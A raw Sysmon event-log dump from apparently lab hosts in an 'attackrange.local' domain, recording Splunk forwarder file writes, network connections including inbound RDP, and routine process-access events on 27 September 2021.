23542300x8000000000000000980125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:21.315{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8373579CB010EA922550C4FA48E2E06,SHA256=E8860E40C929ED4BAAE4490FF59B8B85D2ABC5EFAAD26540F3D50DAC64931674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:21.315{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78F18C1A71C4C3E5A9E906F07B7FF7BE,SHA256=8F936BFCC6CB55B64373D8410CC7D2BBC4BC35A06E94939013F3BE7A97E1F22F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:21.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3732BD00001EDD4621A23878A4A0C2F,SHA256=1000C9ED988D746BD8E5AA7859873F25560F33C84232BAC05A30E96662A9D35F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:16.844{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59461-false10.0.1.12-8000- 23542300x8000000000000000980129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:22.393{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB288C434A49FB3B3ED0D00AA17D4031,SHA256=324D401287BDAF3ED06321D5625293977534E0683E492C36E6D82BE9A79E383D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:20.763{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53475-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:20.012{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15-59462-false10.0.1.14win-dc-429.attackrange.local49672- 23542300x80000000000000001051798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:22.537{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E10F358F06DE238679D9A09E6536B954,SHA256=DD1BEA096AF8F020E380D2DE8114A273C2AFB482B2617FE7FC1730112057301A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:19.506{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54434-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:18.947{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59462-false10.0.1.14-49672- 354300x8000000000000000980126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:18.179{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64153-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001051801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:23.574{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ADEA8F66AE8547E61E4B54850616FF3,SHA256=05ABC8D01FCF881E98E7AF82983503D962903ABB96B193BB8CB1B205FA49B7D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:23.534{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A24A02F1BF9CD6F3A5D3FDDC4CE22E9,SHA256=04F09BEE5791F187FA031B596C4957BFDD1B5FB1F302FBEE2337826CAA516258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:24.589{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43CC3288155BCF54E760496DD31C29B2,SHA256=030A4744ABC26D60BF962D28C2789D20A19CC05E72659717FBE06959B4653B5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:24.971{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78FA6A2BCE71C23DD9AD204E272F7E40,SHA256=E82D1184EA1FF36D1ED1A16BCED6AA06DACBB19641B6F6C690C14BB69E4D3C9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:24.550{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=893632AE471D968AF1920C87F2215424,SHA256=732685C34A9DDF926FCBD19484F8587C57EE9084D274DCB2B1ADA9883942F674,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.878{69CF5F33-8C61-6151-F179-00000000FD01}35921832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C61-6151-F179-00000000FD01}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8C61-6151-F179-00000000FD01}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.612{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C61-6151-F179-00000000FD01}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.597{69CF5F33-8C61-6151-F179-00000000FD01}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:25.565{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6976B81667269147ED86E3171172E46D,SHA256=26F14FDBFFB123698659DFE1A7976141E26CEB1E60280174D9FC3E0EDA08D4F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:25.657{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:25.604{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=310D41A1040AEDC79369793469F0C160,SHA256=C9681C487D5920C7F97D2141E43D8B0ED15FCBCF2481513EACF038D67416CB67,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:22.766{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59463-false10.0.1.12-8000- 354300x8000000000000000980134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:22.629{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50608-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:22.306{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com35147-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000980179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C62-6151-F379-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 